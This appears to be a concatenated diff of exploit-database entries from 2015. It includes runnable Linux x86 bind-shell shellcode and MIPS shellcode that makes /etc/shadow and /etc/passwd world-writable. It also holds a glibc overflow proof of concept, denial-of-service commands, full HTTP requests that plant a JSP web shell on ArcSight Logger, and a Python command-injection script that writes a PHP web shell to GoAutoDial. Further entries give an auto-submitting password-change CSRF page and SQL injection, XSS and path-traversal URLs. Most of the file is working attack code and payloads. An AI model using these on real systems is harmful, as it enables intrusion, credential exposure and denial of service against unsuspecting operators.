* Linux x86 - TCP Bind Shell - 96 bytes
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/02/19/28/
*/
/*
global _start
section .text
_start:
xor ebx, ebx ; zero out ebx
mul ebx ; zero out eax, edx
; socket(AF_INET, SOCK_STREAM, 0);
mov al, 102 ; socketcall()
mov bl, 1 ; socket()
push edx ; protocol
push ebx ; SOCK_STREAM
push 2 ; AF_INET
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; eax contains the newly created socket
mov esi, eax
; bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
mov al, 102 ; socketcall()
inc ebx ; bind() - 2
push edx ; INADDR_ANY
push word 0x3582 ; port
push word bx ; AF_INET
mov ecx, esp ; point to the structure
push 16 ; sizeof(struct sockaddr_in)
push ecx ; &serv_addr
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; listen(sockfd, backlog);
mov al, 102 ; socketcall()
mov bl, 4 ; listen()
push edx ; backlog
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size);
mov al, 102 ; socketcall()
mov bl, 5 ; accept()
push edx ; zero addrlen
push edx ; null sockaddr
push esi ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; eax contains the descriptor for the accepted socket
xchg ebx, eax
xor ecx, ecx ; zero out ecx
mov cl, 2 ; initialize counter
loop:
; dup2(connfd, 0);
mov al, 63 ; dup2()
int 0x80
dec ecx
jns loop
; execve(/bin/sh, [/bin/sh, NULL], NULL);
xchg eax, edx
push eax ; push null bytes (terminate string)
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp ; load address of /bin/sh
push eax ; null terminator
push ebx ; push address of /bin/sh
mov ecx, esp ; load array address
push eax ; push null terminator
mov edx, esp ; empty envp array
mov al, 11 ; execve()
int 0x80 ; call execve()
*/
#include <stdio.h>
#include <string.h>
#define PORT_NUMBER "\x82\x35" // 33333
unsigned char code[] =
"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
"\x66\x43\x52\x66\x68"
PORT_NUMBER
"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80";
int main(void) {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

78
platforms/linux/dos/36404.c Executable file
View file

@ -0,0 +1,78 @@
source: http://www.securityfocus.com/bid/50898/info
GNU glibc is prone to an remote integer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that uses the affected library.
#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>
#define TZ_MAGIC "TZif"
#define PUT_32BIT_MSB(cp, value) \
do { \
(cp)[0] = (value) >> 24; \
(cp)[1] = (value) >> 16; \
(cp)[2] = (value) >> 8; \
(cp)[3] = (value); \
} while (0)
struct tzhead {
char tzh_magic[4];
char tzh_version[1];
char tzh_reserved[15];
char tzh_ttisgmtcnt[4];
char tzh_ttisstdcnt[4];
char tzh_leapcnt[4];
char tzh_timecnt[4];
char tzh_typecnt[4];
char tzh_charcnt[4];
};
struct ttinfo
{
long int offset;
unsigned char isdst;
unsigned char idx;
unsigned char isstd;
unsigned char isgmt;
};
int main(void)
{
struct tzhead evil;
int i;
char *p;
42
uint32_t total_size;
uint32_t evil1, evil2;
/* Initialize static part of the header */
memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
evil.tzh_version[0] = 0;
memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));
/* Initialize nasty part of the header */
evil1 = 500;
PUT_32BIT_MSB(evil.tzh_timecnt, evil1);
total_size = evil1 * (sizeof(time_t) + 1);
total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
& ~(__alignof__ (struct ttinfo) - 1));
/* value of chars, to get a malloc(0) */
evil2 = 0 - total_size;
PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
p = (char *)&evil;
for (i = 0; i < sizeof(evil); i++)
printf("%c", p[i]);
/* data we overflow with */
for (i = 0; i < 50000; i++)
printf("A");
}

27
platforms/linux/local/36388.py Executable file
View file

@ -0,0 +1,27 @@
#!/usr/bin/python
#Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC
#Date Discovered: 15th March' 2015
# Exploit Author: Avinash Kumar Thapa "-Acid"
# Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop
# Homepage:https://wiki.gnome.org/Apps/Brasero
# Tested on: Kali Linux 1.0.9
buffer ="A"*26109
buffer += "CCCC"
buffer += "D"*10500
file = "crash.m3u"
f = open(file, "w")
f.write(buffer)
f.close()
# After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session.
#####################################################################
# -Acid #
#####################################################################

181
platforms/linux/remote/36370.txt Executable file
View file

@ -0,0 +1,181 @@
# Exploit Title: ArcSight Logger - Arbitrary File Upload (Code Execution)
# Date: 13.03.2015
# Exploit Author: Julian Horoszkiewicz
# Vendor Homepage: www.hp.com
# Software Link: http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/try-now.html
# Version: ArcSight Logger 5.3.1.6838.0 and prior versions
# Tested on: Red Hat Linux
# CVE: CVE-2014-7884
[ Description ]
Configuration import file upload capability does not fully sanitize file names, which allows attackers to put executable files into the document root. Upload of server side (JSP) script with shell accessing function in order to gain remote OS command execution has been conducted in the POC. To access vulnerable feature, user has to be authenticated in the console. Feature is available to all users, also non-administrative ones. Shell commands are executed with default NPA privileges (arcsight) giving full control over the service (for instance /etc/init.d/arcsight_logger stop has been successfully performed). The culprit feature is accessible to all authenticated users, including ones with sole read-only admin role.
[ Proof of Concept ]
Attention, to reproduce the attack for the first time, two requests are required.
First request magically creates subdirectory in the /opt/arcsight/current/backups upload dir.
Second one puts the actual JSP web shell into the document root, by using path traversal refering to the upload dir subdirectory.
Other combinations of direct name manipulation in order to upload anything to the document root did not succeed during the test (references to the upload dir without a subdirectory were refused by the application).
The only required difference between the requests to achieve successful upload into desired location is the filename property in the Content-Disposition HTTP header.
The general rule is as follows:
First request (create /opt/arcsight/current/backups/some_new_dir directory, the uploaded file is irrelevant):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/whatever"
Second request (upload the file into location of choice by traversally refering to that subdirectory):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
Please also note that valid tokens (asf_token, session_string, JSESSIONID) are required.
The most efficient way to reproduce this is:
1) name the local JSP web shell file toanything.xml.gz extension
2) choose to import it in the Configuration->Content Management->Import section through the web browser
3) intercept the browser traffic with a local proxy (Burp Suite for instance)
4) change the filename property in the Content-Disposition header so it contains the name of new subdirectory and forward the request
5) send another copy of the same request, this time with filename referring to the subdirectory created with previous request, using path traversal to point into the Logger document root, successfully uploading the web shell.
6) Navigate the browser to http://victim.com:9000/logger/hellcode.jsp
Full requests:
POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565
-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"
-----------------------------17152166115305
Content-Disposition: form-data; name="update"
true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"
7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/hellcode.jsp"
Content-Type: application/x-gzip
<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
-----------------------------17152166115305--
POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565
-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"
-----------------------------17152166115305
Content-Disposition: form-data; name="update"
true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"
7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
Content-Type: application/x-gzip
<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
-----------------------------17152166115305--
[ Time line ]
28.08.2014 - vulnerability report sent to HP
21.01.2015 - new version containing the fix released by HP
12.03.2015 - security bulletin published (CVE-2014-7884)
[ Credits ]
Julian Horoszkiewicz - IT Security Specialist @ ING Services Polska

37
platforms/linux_mips/shellcode/36274.c Executable file
View file

@ -0,0 +1,37 @@
#include <stdio.h>
/*
Title: Linux/MIPS (Little Endian) - chmod 666 /etc/shadow - 55 bytes
Date: 2015-03-05
Author: Sang-Min LEE
Email: leesangmin144@gmail.com
Blog: http://smleenull.tistory.com
*/
char sc[] = {
"\xff\xff\x06\x28" // slti $a2, $zero, -1
"\xff\xff\xd0\x04" // bltzal $a2, p <p>
"\xff\xff\x05\x28" // slti $a1, $zero, -1
"\xb6\x01\x05\x24" // li $a1, 438
"\x01\x10\xe4\x27" // addu $a0, $ra, 4097
"\x1f\xf0\x84\x24" // addu $a0, $a0, -4065
"\xaf\x0f\x02\x24" // li $v0, 4015
"\x0c\x01\x01\x01" // syscall 0x40404
"\xff\xff\x04\x28" // slti $a0, $zero, -1
"\xa1\x0f\x02\x24" // li $v0, 4001
"\x0c\x01\x01\x01" // syscall 0x40404
"/etc/shadow"
};
/*
Shellcode
\xff\xff\x06\x28\xff\xff\xd0\x04\xff\xff\x05\x28\xb6\x01\x05\x24\x01\x10\xe4\x27\x1f\xf0\x84\x24\xaf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x04\x28\xa1\x0f\x02\x24\x0c\x01\x01\x01\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77
*/
void main ()
{
void (*s)(void);
printf("sc size %d\n", sizeof(sc));
s = sc;
s();
}

37
platforms/linux_mips/shellcode/36276.c Executable file
View file

@ -0,0 +1,37 @@
#include <stdio.h>
/*
Title: Linux/MIPS (Little Endian) - chmod 666 /etc/passwd - 55 bytes
Date: 2015-03-05
Author: Sang-Min LEE
Email: leesangmin144@gmail.com
Blog: http://smleenull.tistory.com
*/
char sc[] = {
"\xff\xff\x06\x28" // slti $a2, $zero, -1
"\xff\xff\xd0\x04" // bltzal $a2, p <p>
"\xff\xff\x05\x28" // slti $a1, $zero, -1
"\xb6\x01\x05\x24" // li $a1, 438
"\x01\x10\xe4\x27" // addu $a0, $ra, 4097
"\x1f\xf0\x84\x24" // addu $a0, $a0, -4065
"\xaf\x0f\x02\x24" // li $v0, 4015
"\x0c\x01\x01\x01" // syscall 0x40404
"\xff\xff\x04\x28" // slti $a0, $zero, -1
"\xa1\x0f\x02\x24" // li $v0, 4001
"\x0c\x01\x01\x01" // syscall 0x40404
"/etc/passwd"
};
/*
Shellcode
\xff\xff\x06\x28\xff\xff\xd0\x04\xff\xff\x05\x28\xb6\x01\x05\x24\x01\x10\xe4\x27\x1f\xf0\x84\x24\xaf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x04\x28\xa1\x0f\x02\x24\x0c\x01\x01\x01\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64
*/
void main ()
{
void (*s)(void);
printf("sc size %d\n", sizeof(sc));
s = sc;
s();
}

7
platforms/multiple/dos/36377.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

7
platforms/multiple/dos/36378.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

58
platforms/php/webapps/36231.py Executable file
View file

@ -0,0 +1,58 @@
# Title : GoAutoDial CE 2.0 Shell Upload
# Date : 28/02/2015
# Author : R-73eN
# Software : GoAutoDial CE 2.0
# Tested : On Linux vicisrv.loc 2.6.18-238.9.1.el5.goPAE #1 GoAutoDial CE 2.0
import socket
import sys
banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
CRLF = "\r\n"
def checkvuln():
command = "uname"
evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,80))
evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
s.send(evilREQ)
a = s.recv(1024)
if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Linux") != -1):
print '[ + ] Server Is vulnerable [ + ]\n'
shellupload()
else:
print '[ - ] Server is not vulnerable [ - ]\n'
s.close()
def shellupload():
command = "echo 'Infogen-AL<br><?php echo system($_GET['cmd']);?>' > /var/www/html/infogen.php"
#command = "rm /var/www/html/123.pl;rm /var/www/html/TEST.perl"
command = command.replace(" ", "%20")
evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,80))
evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
s.send(evilREQ)
a = s.recv(1024)
if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") == -1):
print '[ + ] Shell uploaded successfully [ + ]\n'
print '[ + ] http://' + host + '/infogen.php [ + ]\n'
else:
print '[ - ] Shell upload failed.... [ - ]'
s.close()
if(len(sys.argv) < 4):
print '\n Usage : exploit.py 127.0.0.1 /goautodial-agent/ agentuser agentpassword\n'
else:
host = sys.argv[1]
path = sys.argv[2]
user = sys.argv[3]
password = sys.argv[4]
checkvuln()
print 'Visit Us : http://infogen.al/'

26
platforms/php/webapps/36242.txt Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
attacker can do a remote injection in site URL to get some sensitive information .
almost all version are infected by this vunl.
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
greetz to all muslims and all tryag member's
:) from morocco

72
platforms/php/webapps/36243.txt Executable file
View file

@ -0,0 +1,72 @@
# Exploit Title: WordPress: cp-multi-view-calendar.1.1.4 [SQL Injection
vulnerabilities]
# Date: 2015-02-28
# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.4.zip
# Version: 1.1.5
# Tested on: windows 7 ultimate + sqlmap 0.9. It's php aplication
# OWASP Top10: A1-Injection
# Mitigations: Upgrade to version 1.1.5
Greetz to Christian Uriel Mondragon Zarate
Video demo of unauthenticated user sqli explotation vulnerability :
###################################################################
ADMIN PAGE SQL INJECTION
-------------------------------------------------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_add_calendar
sqlinjection in post parameter viewid
-------------------------------------------------------------------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_delete_calendar
sqlinjection in post parameter id
########################################
UNAUTENTICATED SQL INJECTION
-----------------------------------------------------------------
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1
sql injection in id parameter
-----------------------------------------------------------------------
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1
datapost viewtype=list&list_order=asc vuln variable list_order
################################################################
CROSSITE SCRIPTING VULNERABILITY
----------------------------------------------------------
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1
crosite script weekstartday parameter
###################################################
==================================
time-line
26-02-2015: vulnerabilities found
27-02-2015: reported to vendor
28-02-2015: release new cp-multi-view-calendar version 1.1.4
28-02-2015: full disclousure
===================================

41
platforms/php/webapps/36358.html Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]
Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.
Exploit pasted below and attached.
<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
Exploit By: Connection
Blacksun Hacker's Club
irc.blacksunhackers.com #lobby
-->
<form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="user_data[email]" value="hacked@lol.dongs" />
<input type="hidden" name="user_data[password1]" value="CSRFpass" />
<input type="hidden" name="user_data[password2]" value="CSRFpass" />
<input type="hidden" name="user_data[profile_name]" value="Concept" />
<input type="hidden" name="dispatch[profiles.update]" value="" />
</form>
<script>
document.getElementById("CSRF").submit();
</script>
</body>
</html>
Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground

42
platforms/php/webapps/36368.txt Executable file
View file

@ -0,0 +1,42 @@
#Vulnerability title: Community Gallery - Stored Cross-Site Scripting
vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link:
https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong (cuong.k.pham (at) itas (dot) vn [email concealed]) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
Content-Length: 1300
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription%5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7%5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D=1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisEdit%5D=1
- Vulnerable parameter: parameters[data][7][title]
::DISCLOSURE::
+ 12/10/2014: Detect vulnerability
+ 12/10/2014: Send the detail vulnerability to vendor
+ 03/11/2015: Public information
::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2275

56
platforms/php/webapps/36371.txt Executable file
View file

@ -0,0 +1,56 @@
[+]Title: Codiad v2.5.3 - LFI Vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 12/03/2015
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Pie Register 2.x suffers, from a Local File Disclosure vulnerability.
[+]Proof Of Concept:
[PHP]
//////////////////////////////////////////////////////////////////
// Run Download
//////////////////////////////////////////////////////////////////
if(isset($_GET['type']) && ($_GET['type']=='directory' || $_GET['type']=='root')){
// Create tarball
$filename = explode("/",$_GET['path']);
//$filename = array_pop($filename) . "-" . date('Y.m.d') . ".tar.gz";
$filename = array_pop($filename) . "-" . date('Y.m.d');
$targetPath = DATA . '/';
$dir = WORKSPACE . '/' . $_GET['path'];
if(!is_dir($dir)){
exit('<script>parent.codiad.message.error("Directory not found.")</script>');
}
//////////////////////////////////////////////////////////////////
// Check system() command and a non windows OS
//////////////////////////////////////////////////////////////////
if(isAvailable('system') && stripos(PHP_OS, 'win') === false){
# Execute the tar command and save file
$filename .= '.tar.gz';
system("tar -pczf ".$targetPath.$filename." -C ".WORKSPACE." ".$_GET['path']);
$download_file = $targetPath.$filename;
}elseif(extension_loaded('zip')){ //Check if zip-Extension is availiable
//build zipfile
require_once 'class.dirzip.php';
$filename .= '.zip';
$download_file = $targetPath.$filename;
DirZip::zipDir($dir, $targetPath .$filename);
}else{
exit('<script>parent.codiad.message.error("Could not pack the folder, zip-extension missing")</script>');
}
}else{
$filename = explode("/",$_GET['path']);
$filename = array_pop($filename);
$download_file = WORKSPACE . '/' . $_GET['path'];
}
[PHP]
http://demo.codiad.com/i/197156553/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined

66
platforms/php/webapps/36372.txt Executable file
View file

@ -0,0 +1,66 @@
#########################################################
# Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability
# Google dork: inurl:wp-content/themes/DesignFolio-Plus
# Author: CrashBandicot
# Date: 04.03.2015
# Vendor HomePage: https://github.com/UpThemes/DesignFolio-Plus
# Software Link: https://github.com/UpThemes/DesignFolio-Plus/archive/master.zip
# tested on : MsWin32
#########################################################
Vulnerable File : upload-file.php
<?php
//Upload Security
$upload_security = md5($_SERVER['SERVER_ADDR']);
$uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
if( $_FILES[$upload_security] ):
$file = $_FILES[$upload_security];
$file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
if(chmod($file,0777)):
echo "success";
else:
echo "error".$_FILES[$upload_security]['tmp_name'];
endif;
else:
echo "error".$_FILES[$upload_security]['tmp_name'];
endif;
endif;
?>
Exploit
#!/usr/bin/perl
use Digest::MD5 qw(md5 md5_hex);
use MIME::Base64;
use IO::Socket;
use LWP::UserAgent;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\n\t ! *** # ^_^ # *** !\n\t :p\n\n";
$use = "\n\t [!] ./$0 127.0.0.1 backdoor.php";
($target ,$file) = @ARGV;
die "$use" unless $ARGV[0] && $ARGV[1];
if($target =~ /http:\/\/(.*)\//){ $target = $1; }
elsif($target =~ /http:\/\/(.*)/){ $target = $1; }
elsif($target =~ /https:\/\/(.*)\//){ $target = $1; }
elsif($target =~ /https:\/\/(.*)/){ $target = $1; }
